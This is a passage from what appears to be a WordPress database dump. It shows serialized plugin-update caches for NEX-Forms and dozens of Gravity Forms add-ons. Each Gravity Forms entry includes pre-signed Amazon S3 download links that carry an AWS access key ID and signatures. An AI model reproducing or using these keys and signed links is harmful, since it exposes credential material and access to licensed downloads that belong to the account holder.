line.net/repository/updates/nex-forms.zip\";s:12:\"translations\";a:0:{}s:2:\"id\";i:0;s:8:\"homepage\";s:90:\"https://codecanyon.net/item/nexforms-the-ultimate-wordpress-form-builder/7103891?ref=Basix\";s:6:\"tested\";s:5:\"5.5.3\";s:14:\"upgrade_notice\";N;s:5:\"icons\";a:1:{s:2:\"1x\";s:67:\"http://basixonline.net/repository/covers/nex-forms/icon-128x128.png\";}s:8:\"filename\";s:42:\"nex-forms-express-wp-form-builder/main.php\";}s:11:\"updateClass\";s:22:\"Puc_v4p4_Plugin_Update\";s:15:\"updateBaseClass\";s:13:\"Plugin_Update\";}','no'),(19050,'_transient_timeout_GFCache_322bdf69d2d985838da4b68d1be13b30','1681989058','no'),(19051,'_transient_GFCache_322bdf69d2d985838da4b68d1be13b30','a:64:{s:12:\"gravityforms\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:5:\"2.7.4\";s:14:\"version_latest\";s:5:\"2.7.4\";s:3:\"url\";s:165:\"https://s3.amazonaws.com/gravityforms/releases/gravityforms_2.7.4.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=gqiHdODjV3FAmYl2HYC0r4Eg8cs%3D\";s:10:\"url_latest\";s:165:\"https://s3.amazonaws.com/gravityforms/releases/gravityforms_2.7.4.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=gqiHdODjV3FAmYl2HYC0r4Eg8cs%3D\";}s:21:\"gravityforms2checkout\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"2.1\";s:14:\"version_latest\";s:3:\"2.1\";s:3:\"url\";s:182:\"https://s3.amazonaws.com/gravityforms/addons/2checkout/gravityforms2checkout_2.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=cehT2BkjVp%2FVHNoOZgDehDvmgbY%3D\";s:10:\"url_latest\";s:182:\"https://s3.amazonaws.com/gravityforms/addons/2checkout/gravityforms2checkout_2.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=cehT2BkjVp%2FVHNoOZgDehDvmgbY%3D\";}s:26:\"gravityformsactivecampaign\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"2.0\";s:14:\"version_latest\";s:5:\"2.0.1\";s:3:\"url\";s:190:\"https://s3.amazonaws.com/gravityforms/addons/activecampaign/gravityformsactivecampaign_2.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=MxtJchT6LFNY8ckVrJwd93Ei5pQ%3D\";s:10:\"url_latest\";s:192:\"https://s3.amazonaws.com/gravityforms/addons/activecampaign/gravityformsactivecampaign_2.0.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=0abcqqrz2bKWHDM60WTQTiadesM%3D\";}s:32:\"gravityformsadvancedpostcreation\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.3\";s:14:\"version_latest\";s:5:\"1.3.1\";s:3:\"url\";s:206:\"https://s3.amazonaws.com/gravityforms/addons/advancedpostcreation/gravityformsadvancedpostcreation_1.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=mZraYcXoIc%2FtLIaUFvTv6%2BHbZg8%3D\";s:10:\"url_latest\";s:204:\"https://s3.amazonaws.com/gravityforms/addons/advancedpostcreation/gravityformsadvancedpostcreation_1.3.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=2WoZT6YipHtJYS8sgLLcY6RoHMQ%3D\";}s:20:\"gravityformsagilecrm\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.4\";s:14:\"version_latest\";s:5:\"1.4.1\";s:3:\"url\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/agilecrm/gravityformsagilecrm_1.4.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=h56JpVRukeWj4iEsf4mZOUDamLQ%3D\";s:10:\"url_latest\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/agilecrm/gravityformsagilecrm_1.4.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=ZDIp1qPjkVGQGC4BPrDEiYGEzoY%3D\";}s:19:\"gravityformsakismet\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.0\";s:14:\"version_latest\";s:3:\"1.0\";s:3:\"url\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/akismet/gravityformsakismet_1.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=%2B27dERcC75mnEKn9uqXSBSjijag%3D\";s:10:\"url_latest\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/akismet/gravityformsakismet_1.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=%2B27dERcC75mnEKn9uqXSBSjijag%3D\";}s:24:\"gravityformsauthorizenet\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:4:\"2.11\";s:14:\"version_latest\";s:4:\"2.11\";s:3:\"url\";s:189:\"https://s3.amazonaws.com/gravityforms/addons/authorizenet/gravityformsauthorizenet_2.11.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=DTfeTXRGPt2Dxi%2F5QReqbCoTaCA%3D\";s:10:\"url_latest\";s:189:\"https://s3.amazonaws.com/gravityforms/addons/authorizenet/gravityformsauthorizenet_2.11.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=DTfeTXRGPt2Dxi%2F5QReqbCoTaCA%3D\";}s:18:\"gravityformsaweber\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:4:\"2.11\";s:14:\"version_latest\";s:6:\"2.11.2\";s:3:\"url\";s:177:\"https://s3.amazonaws.com/gravityforms/addons/aweber/gravityformsaweber_2.11.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=JJjb8nZ%2BbKJyy2wrB951lHfB2yo%3D\";s:10:\"url_latest\";s:181:\"https://s3.amazonaws.com/gravityforms/addons/aweber/gravityformsaweber_2.11.2.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=JVwstzd%2BCHgkFPNzfYzb76L%2Bbww%3D\";}s:21:\"gravityformsbatchbook\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.3\";s:14:\"version_latest\";s:3:\"1.3\";s:3:\"url\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/batchbook/gravityformsbatchbook_1.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=V3PHaI3bYIQ1jCFU4HTG7D9l6B0%3D\";s:10:\"url_latest\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/batchbook/gravityformsbatchbook_1.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=V3PHaI3bYIQ1jCFU4HTG7D9l6B0%3D\";}s:18:\"gravityformsbreeze\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.5\";s:14:\"version_latest\";s:5:\"1.5.1\";s:3:\"url\";s:174:\"https://s3.amazonaws.com/gravityforms/addons/breeze/gravityformsbreeze_1.5.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=mZJogVI819eWUnAy5nRn119FSE8%3D\";s:10:\"url_latest\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/breeze/gravityformsbreeze_1.5.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=5yAwWX%2FtWWYq7xeBfA4A8YJ4gaI%3D\";}s:27:\"gravityformscampaignmonitor\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"3.9\";s:14:\"version_latest\";s:5:\"3.9.1\";s:3:\"url\";s:192:\"https://s3.amazonaws.com/gravityforms/addons/campaignmonitor/gravityformscampaignmonitor_3.9.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=LmdKfrE4B4NcDFH4YylzSo2yYxs%3D\";s:10:\"url_latest\";s:194:\"https://s3.amazonaws.com/gravityforms/addons/campaignmonitor/gravityformscampaignmonitor_3.9.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=fytnL7TPpNxeTCHvlMASfyyG72E%3D\";}s:20:\"gravityformscampfire\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.1\";s:14:\"version_latest\";s:5:\"1.2.2\";s:3:\"url\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/campfire/gravityformscampfire_1.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=kpGx6%2BWxzfAHSAEe%2B16ecu%2B27Ww%3D\";s:10:\"url_latest\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/campfire/gravityformscampfire_1.2.2.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=9oMlE00W9gk3Ahwl2VYcnN5V1eQ%3D\";}s:22:\"gravityformscapsulecrm\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.6\";s:14:\"version_latest\";s:5:\"1.6.1\";s:3:\"url\";s:186:\"https://s3.amazonaws.com/gravityforms/addons/capsulecrm/gravityformscapsulecrm_1.6.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=wQJZC3qh1WEmpdmL%2BgObkAQl%2Bio%3D\";s:10:\"url_latest\";s:186:\"https://s3.amazonaws.com/gravityforms/addons/capsulecrm/gravityformscapsulecrm_1.6.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=N3ONNINToVIlXNhEuc%2BX24pEyhk%3D\";}s:26:\"gravityformschainedselects\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.6\";s:14:\"version_latest\";s:3:\"1.6\";s:3:\"url\";s:194:\"https://s3.amazonaws.com/gravityforms/addons/chainedselects/gravityformschainedselects_1.6.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=BsXnAJipefx%2Bw1janfiQtH%2BKGJg%3D\";s:10:\"url_latest\";s:194:\"https://s3.amazonaws.com/gravityforms/addons/chainedselects/gravityformschainedselects_1.6.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=BsXnAJipefx%2Bw1janfiQtH%2BKGJg%3D\";}s:23:\"gravityformscleverreach\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.8\";s:14:\"version_latest\";s:3:\"1.8\";s:3:\"url\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/cleverreach/gravityformscleverreach_1.8.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=WOVsMBMjugnkjE3A1Gt9mkUUqlY%3D\";s:10:\"url_latest\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/cleverreach/gravityformscleverreach_1.8.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=WOVsMBMjugnkjE3A1Gt9mkUUqlY%3D\";}s:15:\"gravityformscli\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:0:\"\";s:14:\"version_latest\";s:3:\"1.4\";s:3:\"url\";s:0:\"\";s:10:\"url_latest\";s:172:\"https://s3.amazonaws.com/gravityforms/addons/cli/gravityformscli_1.4.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=pLR%2FBN%2BawCcpq2LCazXWOyBY6q4%3D\";}s:27:\"gravityformsconstantcontact\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.7\";s:14:\"version_latest\";s:3:\"1.7\";s:3:\"url\";s:198:\"https://s3.amazonaws.com/gravityforms/addons/constantcontact/gravityformsconstantcontact_1.7.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=bbkH%2FqumRxzDmsG2%2Frsss%2Fs7szw%3D\";s:10:\"url_latest\";s:198:\"https://s3.amazonaws.com/gravityforms/addons/constantcontact/gravityformsconstantcontact_1.7.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=bbkH%2FqumRxzDmsG2%2Frsss%2Fs7szw%3D\";}s:31:\"gravityformsconversationalforms\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:10:\"1.0-beta-3\";s:14:\"version_latest\";s:10:\"1.0-beta-3\";s:3:\"url\";s:209:\"https://s3.amazonaws.com/gravityforms/addons/conversationalforms/gravityformsconversationalforms_1.0-beta-3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=yuWHLes%2FEvHd9oo5463LeEZXW4A%3D\";s:10:\"url_latest\";s:209:\"https://s3.amazonaws.com/gravityforms/addons/conversationalforms/gravityformsconversationalforms_1.0-beta-3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=yuWHLes%2FEvHd9oo5463LeEZXW4A%3D\";}s:19:\"gravityformscoupons\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"3.1\";s:14:\"version_latest\";s:3:\"3.1\";s:3:\"url\";s:176:\"https://s3.amazonaws.com/gravityforms/addons/coupons/gravityformscoupons_3.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=XqppzcGjnJJgFsjnNxrdspaS9e4%3D\";s:10:\"url_latest\";s:176:\"https://s3.amazonaws.com/gravityforms/addons/coupons/gravityformscoupons_3.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=XqppzcGjnJJgFsjnNxrdspaS9e4%3D\";}s:17:\"gravityformsdebug\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:0:\"\";s:14:\"version_latest\";s:10:\"1.0.beta12\";s:3:\"url\";s:0:\"\";s:10:\"url_latest\";s:179:\"https://s3.amazonaws.com/gravityforms/addons/debug/gravityformsdebug_1.0.beta12.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=6tr39RfMnDLfksNATcakvZqPbe0%3D\";}s:19:\"gravityformsdropbox\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"3.1\";s:14:\"version_latest\";s:3:\"3.1\";s:3:\"url\";s:176:\"https://s3.amazonaws.com/gravityforms/addons/dropbox/gravityformsdropbox_3.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=wkIuxQ520fH8rGh5tnQ7fbOnkZ4%3D\";s:10:\"url_latest\";s:176:\"https://s3.amazonaws.com/gravityforms/addons/dropbox/gravityformsdropbox_3.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=wkIuxQ520fH8rGh5tnQ7fbOnkZ4%3D\";}s:24:\"gravityformsemailoctopus\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.2\";s:14:\"version_latest\";s:5:\"1.2.2\";s:3:\"url\";s:186:\"https://s3.amazonaws.com/gravityforms/addons/emailoctopus/gravityformsemailoctopus_1.2.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=KfNYg6GsCcxOdQVNw4TnTYHhEak%3D\";s:10:\"url_latest\";s:188:\"https://s3.amazonaws.com/gravityforms/addons/emailoctopus/gravityformsemailoctopus_1.2.2.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=fnVla1TzyjokHjXGsWUW4QnSar4%3D\";}s:16:\"gravityformsemma\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.5\";s:14:\"version_latest\";s:5:\"1.5.2\";s:3:\"url\";s:170:\"https://s3.amazonaws.com/gravityforms/addons/emma/gravityformsemma_1.5.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=Jjc6m6RaHKsoVEmNZnAtKJjGtlg%3D\";s:10:\"url_latest\";s:172:\"https://s3.amazonaws.com/gravityforms/addons/emma/gravityformsemma_1.5.2.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=HqZUbvwTxU5NKkIiW4OGBpw2a0s%3D\";}s:22:\"gravityformsfreshbooks\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"2.8\";s:14:\"version_latest\";s:3:\"2.8\";s:3:\"url\";s:186:\"https://s3.amazonaws.com/gravityforms/addons/freshbooks/gravityformsfreshbooks_2.8.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=GLVPojy8sJ%2BPD%2F26Z9rUmrjzOpc%3D\";s:10:\"url_latest\";s:186:\"https://s3.amazonaws.com/gravityforms/addons/freshbooks/gravityformsfreshbooks_2.8.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=GLVPojy8sJ%2BPD%2F26Z9rUmrjzOpc%3D\";}s:23:\"gravityformsgeolocation\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.0\";s:14:\"version_latest\";s:3:\"1.0\";s:3:\"url\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/geolocation/gravityformsgeolocation_1.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=X8XL0EOb5XaZniFcUR1aEmj71Cg%3D\";s:10:\"url_latest\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/geolocation/gravityformsgeolocation_1.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=X8XL0EOb5XaZniFcUR1aEmj71Cg%3D\";}s:23:\"gravityformsgetresponse\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.7\";s:14:\"version_latest\";s:5:\"1.7.1\";s:3:\"url\";s:186:\"https://s3.amazonaws.com/gravityforms/addons/getresponse/gravityformsgetresponse_1.7.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=TDIfhbh76HhCfGUf%2BxwK1I7WlS8%3D\";s:10:\"url_latest\";s:186:\"https://s3.amazonaws.com/gravityforms/addons/getresponse/gravityformsgetresponse_1.7.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=VQ6am793wWaYRMhF58FGHcMLZTg%3D\";}s:27:\"gravityformsgoogleanalytics\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.2\";s:14:\"version_latest\";s:5:\"1.2.1\";s:3:\"url\";s:192:\"https://s3.amazonaws.com/gravityforms/addons/googleanalytics/gravityformsgoogleanalytics_1.2.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=IKHq9u1UrqMseoBMSlIGpVSgCf0%3D\";s:10:\"url_latest\";s:194:\"https://s3.amazonaws.com/gravityforms/addons/googleanalytics/gravityformsgoogleanalytics_1.2.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=KeZ30VbRy3V5tmOb8PhUmkcTE1I%3D\";}s:21:\"gravityformsgutenberg\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:10:\"1.0-rc-1.4\";s:14:\"version_latest\";s:10:\"1.0-rc-1.5\";s:3:\"url\";s:187:\"https://s3.amazonaws.com/gravityforms/addons/gutenberg/gravityformsgutenberg_1.0-rc-1.4.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=7zBRCO6pjjUgE0zZeXUZsmbqaDU%3D\";s:10:\"url_latest\";s:187:\"https://s3.amazonaws.com/gravityforms/addons/gutenberg/gravityformsgutenberg_1.0-rc-1.5.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=NA4DdRmCBmACh3x8mVRRKN4VGzI%3D\";}s:21:\"gravityformshelpscout\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"2.1\";s:14:\"version_latest\";s:5:\"2.1.1\";s:3:\"url\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/helpscout/gravityformshelpscout_2.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=waJQxspwp6d2khKacPtQS2CiqZ8%3D\";s:10:\"url_latest\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/helpscout/gravityformshelpscout_2.1.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=t5ZOJZR8fSybmJEZcJBYiV%2FXYGo%3D\";}s:20:\"gravityformshighrise\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.3\";s:14:\"version_latest\";s:3:\"1.3\";s:3:\"url\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/highrise/gravityformshighrise_1.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=izlMOTRsDFNy5DHUXCpxPg6kt8Q%3D\";s:10:\"url_latest\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/highrise/gravityformshighrise_1.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=izlMOTRsDFNy5DHUXCpxPg6kt8Q%3D\";}s:19:\"gravityformshipchat\";a:3:{s:12:\"is_available\";b:0;s:7:\"version\";s:3:\"1.2\";s:14:\"version_latest\";s:3:\"1.2\";}s:19:\"gravityformshubspot\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.9\";s:14:\"version_latest\";s:3:\"1.9\";s:3:\"url\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/hubspot/gravityformshubspot_1.9.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=fehlPT4yVbnyl3UHs%2Fynz0ExUhQ%3D\";s:10:\"url_latest\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/hubspot/gravityformshubspot_1.9.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=fehlPT4yVbnyl3UHs%2Fynz0ExUhQ%3D\";}s:20:\"gravityformsicontact\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.5\";s:14:\"version_latest\";s:5:\"1.5.1\";s:3:\"url\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/icontact/gravityformsicontact_1.5.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=EKnK6q0xIOWKUJjCuX7FVRFqvkU%3D\";s:10:\"url_latest\";s:182:\"https://s3.amazonaws.com/gravityforms/addons/icontact/gravityformsicontact_1.5.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=Zt21xJUydpUL7%2FI7JXAGk3yYUzI%3D\";}s:19:\"gravityformslogging\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.3\";s:14:\"version_latest\";s:5:\"1.3.1\";s:3:\"url\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/logging/gravityformslogging_1.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=Wi0mPXhVP%2FzWfo69Abo%2Fj2JHvkg%3D\";s:10:\"url_latest\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/logging/gravityformslogging_1.3.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=CBvtfv6D3vV%2BezC6mAxTcstV2W4%3D\";}s:19:\"gravityformsmadmimi\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.4\";s:14:\"version_latest\";s:5:\"1.4.1\";s:3:\"url\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/madmimi/gravityformsmadmimi_1.4.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=iFke%2BIL6KVBA%2F%2BAuapxeL8Bu%2BPs%3D\";s:10:\"url_latest\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/madmimi/gravityformsmadmimi_1.4.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=ggrGuNxfvl2XPKEOGMZVtcmr43Y%3D\";}s:21:\"gravityformsmailchimp\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"5.2\";s:14:\"version_latest\";s:5:\"5.2.0\";s:3:\"url\";s:188:\"https://s3.amazonaws.com/gravityforms/addons/mailchimp/gravityformsmailchimp_5.2.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=%2B9vsm%2B0RK9o7gn%2FVjiFovolAJs8%3D\";s:10:\"url_latest\";s:188:\"https://s3.amazonaws.com/gravityforms/addons/mailchimp/gravityformsmailchimp_5.2.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=%2B9vsm%2B0RK9o7gn%2FVjiFovolAJs8%3D\";}s:19:\"gravityformsmailgun\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.3\";s:14:\"version_latest\";s:5:\"1.3.1\";s:3:\"url\";s:176:\"https://s3.amazonaws.com/gravityforms/addons/mailgun/gravityformsmailgun_1.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=hDx5nIteQou6nY6loi85rL3yxKs%3D\";s:10:\"url_latest\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/mailgun/gravityformsmailgun_1.3.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=wL2nQn1Ve81GZ7Q6uxDFIxUzl1w%3D\";}s:22:\"gravityformsmoderation\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.0\";s:14:\"version_latest\";s:3:\"1.0\";s:3:\"url\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/moderation/gravityformsmoderation_1.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=OVpA53WVe%2Fvs5RM5a7qmYggKx5g%3D\";s:10:\"url_latest\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/moderation/gravityformsmoderation_1.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=OVpA53WVe%2Fvs5RM5a7qmYggKx5g%3D\";}s:18:\"gravityformsmollie\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.3\";s:14:\"version_latest\";s:3:\"1.3\";s:3:\"url\";s:174:\"https://s3.amazonaws.com/gravityforms/addons/mollie/gravityformsmollie_1.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=WoA6wI2X8MHN4j2JumkVLmK1QbM%3D\";s:10:\"url_latest\";s:174:\"https://s3.amazonaws.com/gravityforms/addons/mollie/gravityformsmollie_1.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=WoA6wI2X8MHN4j2JumkVLmK1QbM%3D\";}s:26:\"gravityformspartialentries\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.7\";s:14:\"version_latest\";s:3:\"1.7\";s:3:\"url\";s:192:\"https://s3.amazonaws.com/gravityforms/addons/partialentries/gravityformspartialentries_1.7.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=lYCgv6VkuomE%2FTtebaVB8gEbZYM%3D\";s:10:\"url_latest\";s:192:\"https://s3.amazonaws.com/gravityforms/addons/partialentries/gravityformspartialentries_1.7.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=lYCgv6VkuomE%2FTtebaVB8gEbZYM%3D\";}s:18:\"gravityformspaypal\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"3.5\";s:14:\"version_latest\";s:3:\"3.5\";s:3:\"url\";s:176:\"https://s3.amazonaws.com/gravityforms/addons/paypal/gravityformspaypal_3.5.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=zbkrTvh5f7Qxp%2FNUpCDbB4PiNVs%3D\";s:10:\"url_latest\";s:176:\"https://s3.amazonaws.com/gravityforms/addons/paypal/gravityformspaypal_3.5.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=zbkrTvh5f7Qxp%2FNUpCDbB4PiNVs%3D\";}s:33:\"gravityformspaypalexpresscheckout\";a:3:{s:12:\"is_available\";b:0;s:7:\"version\";s:0:\"\";s:14:\"version_latest\";N;}s:29:\"gravityformspaypalpaymentspro\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"2.7\";s:14:\"version_latest\";s:3:\"2.7\";s:3:\"url\";s:198:\"https://s3.amazonaws.com/gravityforms/addons/paypalpaymentspro/gravityformspaypalpaymentspro_2.7.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=%2FASVgCvglfpHcxCIjhex2A